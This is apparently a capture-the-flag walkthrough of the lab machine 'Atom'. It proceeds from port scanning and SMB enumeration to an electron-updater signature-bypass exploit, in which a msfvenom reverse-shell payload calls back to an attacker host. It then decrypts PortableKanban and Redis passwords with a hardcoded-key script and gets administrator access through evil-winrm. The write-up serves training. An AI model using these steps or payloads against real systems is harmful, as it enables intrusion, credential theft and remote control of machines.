Atom

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.237 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Mon Apr 17 08:38:39 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.237
Nmap scan report for 10.10.10.237
Host is up (0.053s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
443/tcp  open  https
445/tcp  open  microsoft-ds
5985/tcp open  wsman
6379/tcp open  redis
7680/tcp open  pando-pub

# Nmap done at Mon Apr 17 08:39:05 2023 -- 1 IP address (1 host up) scanned in 26.46 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,135,443,445,5985,6379,7680 10.10.10.237 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Mon Apr 17 08:39:52 2023 as: nmap -sCV -p80,135,443,445,5985,6379,7680 -Pn -n -oN targeted 10.10.10.237
Nmap scan report for 10.10.10.237
Host is up (0.040s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Heed Solutions
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc        Microsoft Windows RPC
443/tcp  open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| tls-alpn: 
|_  http/1.1
|_http-title: Heed Solutions
| http-methods: 
|_  Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
6379/tcp open  redis        Redis key-value store
7680/tcp open  pando-pub?
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h20m00s, deviation: 4h02m30s, median: 0s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-04-17T08:40:41
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-04-17T01:40:39-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 17 08:41:19 2023 -- 1 IP address (1 host up) scanned in 87.28 seconds

Let's start enumerating the website. It shows a simple landing page from where we can download a ZIP file from the Download for Windows button.

Once downloaded, unzip the heed_setup_v1.0.0.zip file.

unzip heed_setup_v1.0.0.zip

Now we get the heedv1 Setup 1.0.0.exe binary, which we can also decompress.

7z x heedv1\ Setup\ 1.0.0.exe

Now we've got the $PLUGINSDIR directory and the Uninstall heedv1.exe binary. Inside the folder there is another compressed file.

cd $PLUGINSDIR/

7z x /app-64.7z

Once decompressed, we should see the resources directory, which has a file called app.asar.

ls -l resources

total 3340
-rw-r--r--  1 root root 2994272 Apr  9  2021 app.asar
-rw-r--r--  1 root root      79 Apr  9  2021 app-update.yml
-rw-r--r--  1 root root  296356 Apr  9  2021 electron.asar
-rw-r--r--  1 root root  114416 Apr  9  2021 elevate.exe
drwx------ 69 root root    4096 Apr  9  2021 inspector

It is possible to view and extract files from .asar files.

asar list app.asar

...
/main.js
...

There is one file called main.js which could have valuable information. Extract that file to the current directory and check it out.

asar extract-file app.asar main.js

cat main.js

const {app, BrowserWindow, Menu, protocol, ipcMain} = require('electron');
const log = require('electron-log');
const {autoUpdater} = require("electron-updater");
const path = require('path');
...

As we can see, it is requiring electron-updater. This might be helpful information in the future. Let's keep enumerating the server by listing SMB shares.

smbmap -H 10.10.10.237 -u 'guest'

[+] IP: 10.10.10.237:445        Name: atom.htb                                          
        Disk                                            Permissions     Comment
        ----                                            -----------     -------
        ADMIN$                                          NO ACCESS       Remote Admin
        C$                                              NO ACCESS       Default share
        IPC$                                            READ ONLY       Remote IPC
        Software_Updates                                READ, WRITE

Anonymous login is enabled and we can read and write into the Software_Updates share. Let's mount it to the system, and check its content.

mkdir /mnt/Software_Updates

mount -t cifs //10.10.10.237/Software_Updates /mnt/Software_Updates

tree -fas /mnt/Software_Updates/

[       4096]  /mnt/Software_Updates
├── [          0]  /mnt/Software_Updates/client1
├── [          0]  /mnt/Software_Updates/client2
├── [          0]  /mnt/Software_Updates/client3
└── [      35202]  /mnt/Software_Updates/UAT_Testing_Procedures.pdf

4 directories, 1 file

The PDF file says that the QA team will check the client folders.

Exploitation

As we saw earlier, the main.js was using electron-updater. If we google for any common exploits associated with that technology, we'll find an article called Signature Validation Bypass Leading to RCE In Electron-Updater, explaining how to get remote command execution. First, we need to create a malicious .exe file with a ' character in the name.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.14 LPORT=4444 -f exe -o "r'everse.exe"

Then, we need to create a file called latest.yml with a link to an HTTP server pointing to the r'everse.exe file and the SHA512 hash of the file.

sha512sum r'everse.exe

nano latest.yml

version: 1.2.3
path: http://10.10.14.14/r'everse.exe
sha512: 95e253d75be760812f540136134994d7a397d2dd00bafbe9fbb12ffc7dffa7efcbfe629cdb828eca046f1c1c99c4c75d8c834f5a6a1c5aa7c841d28923967270

Now, set a simple HTTP server where the r'everse.exe binary is located.

python -m http.server 80

And a netcat listener on port 4444 with rlwrap.

nc -lvnp 4444

Finally, copy the latest.yml file to the client1 folder from the Software_Updates share. Once the QA team installs the latest.yml, we'll get a reverse shell as jason, and then we'll be able to grab the user flag.

cp latest.yml /mnt/Software_Updates/client1

Listening on 0.0.0.0 4444
Connection received on 10.10.10.237 55563
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
atom\jason

C:\WINDOWS\system32>type \users\jason\desktop\user.txt
type \users\jason\desktop\user.txt
87191113288e39df1410cd2aeb9757ba

Privilege Escalation

Inside the downloads folder, there is one directory called PortableKanban.

dir \users\jason\downloads

dir \users\jason\downloads
 Volume in drive C has no label.
 Volume Serial Number is 9793-C2E6

 Directory of C:\users\jason\downloads

04/02/2021  08:00 AM    <DIR>          .
04/02/2021  08:00 AM    <DIR>          ..
03/31/2021  02:36 AM    <DIR>          node_modules
04/02/2021  08:21 PM    <DIR>          PortableKanban
               0 File(s)              0 bytes
               4 Dir(s)   5,616,992,256 bytes free

Inside the PortableKanban folder, there is one configuration file called PortableKanban.cfg.

dir \users\jason\downloads\PortableKanban

 Volume in drive C has no label.
 Volume Serial Number is 9793-C2E6

 Directory of C:\users\jason\downloads\PortableKanban

04/02/2021  08:21 PM    <DIR>          .
04/02/2021  08:21 PM    <DIR>          ..
02/27/2013  08:06 AM            58,368 CommandLine.dll
11/08/2017  01:52 PM           141,312 CsvHelper.dll
06/22/2016  09:31 PM           456,704 DotNetZip.dll
04/02/2021  07:44 AM    <DIR>          Files
11/23/2017  04:29 PM            23,040 Itenso.Rtf.Converter.Html.dll
11/23/2017  04:29 PM            75,776 Itenso.Rtf.Interpreter.dll
11/23/2017  04:29 PM            32,768 Itenso.Rtf.Parser.dll
11/23/2017  04:29 PM            19,968 Itenso.Sys.dll
11/23/2017  04:29 PM           376,832 MsgReader.dll
07/03/2014  10:20 PM           133,296 Ookii.Dialogs.dll
04/02/2021  07:17 AM    <DIR>          Plugins
04/02/2021  08:22 PM             5,920 PortableKanban.cfg
01/04/2018  09:12 PM           118,184 PortableKanban.Data.dll
01/04/2018  09:12 PM         1,878,440 PortableKanban.exe
01/04/2018  09:12 PM            31,144 PortableKanban.Extensions.dll
04/02/2021  07:21 AM               172 PortableKanban.pk3.lock
09/06/2017  12:18 PM           413,184 ServiceStack.Common.dll
09/06/2017  12:17 PM           137,216 ServiceStack.Interfaces.dll
09/06/2017  12:02 PM           292,352 ServiceStack.Redis.dll
09/06/2017  04:38 AM           411,648 ServiceStack.Text.dll
01/04/2018  09:14 PM         1,050,092 User Guide.pdf
              19 File(s)      5,656,416 bytes
               4 Dir(s)   5,614,505,984 bytes free

The PortableKanban.cfg file has one encrypted password for a Redis database.

type \users\jason\downloads\PortableKanban\PortableKanban.cfg

{
    "RoamingSettings":
    {
        "DataSource":"RedisServer",
        "DbServer":"localhost",
        "DbPort":6379,
        "DbEncPassword":"Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb",
        "DbServer2":"","DbPort2":6379
...

There is one Portable Kanban vulnerability, which seems to decrypt some passwords.

searchsploit PortableKanban

------------------------------------------------------------- -----------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- -----------------------
PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval | windows/local/49409.py
------------------------------------------------------------- -----------------------
Shellcodes: No Results

Let's transfer it to our local machine, and modify it a bit.

searchsploit -m windows/local/49409.py

nano 49409.py

import json
import base64
from des import * #python3 -m pip install des
import sys

try:
	password = sys.argv[1]
except:
	exit("Supply encrypted password")

def decode(hash):
	hash = base64.b64decode(hash.encode('utf-8'))
	key = DesKey(b"7ly6UznJ")
	return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

print("Clear text: {}".format(decode(password)))

Run the script to get the clear text password.

python 49409.py 'Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb'

Clear text: kidvscat_yes_kidvscat

Now that we have credentials for the Redis database, let's connect to it and authenticate. Once logged in, we'll see there is one database.

redis-cli -h 10.10.10.237

10.10.10.237:6379> auth kidvscat_yes_kidvscat
OK
10.10.10.237:6379> info
...
# Keyspace
db0:keys=4,expires=0,avg_ttl=0

It has four keys.

10.10.10.237:6379[1]> select 0
OK
10.10.10.237:6379> keys *
1) "pk:ids:User"
2) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
3) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
4) "pk:ids:MetaDataClass"

And the third one has another encrypted password.

10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"

Run again the script with the new encrypted password.

python 49409.py 'Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi'

Clear text: kidvscat_admin_@123

This password is valid for the administrator user.

crackmapexec smb 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'

SMB         10.10.10.237    445    ATOM             [*] Windows 10 Pro 19042 x64 (name:ATOM) (domain:ATOM) (signing:False) (SMBv1:True)
SMB         10.10.10.237    445    ATOM             [+] ATOM\administrator:kidvscat_admin_@123 (Pwn3d!)

Finally, get a shell as the administrator, and then all we have to do is reap the harvest and take the root flag.

evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
atom\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
82ba3dc4bb1a5e965dc5ae876d4f842d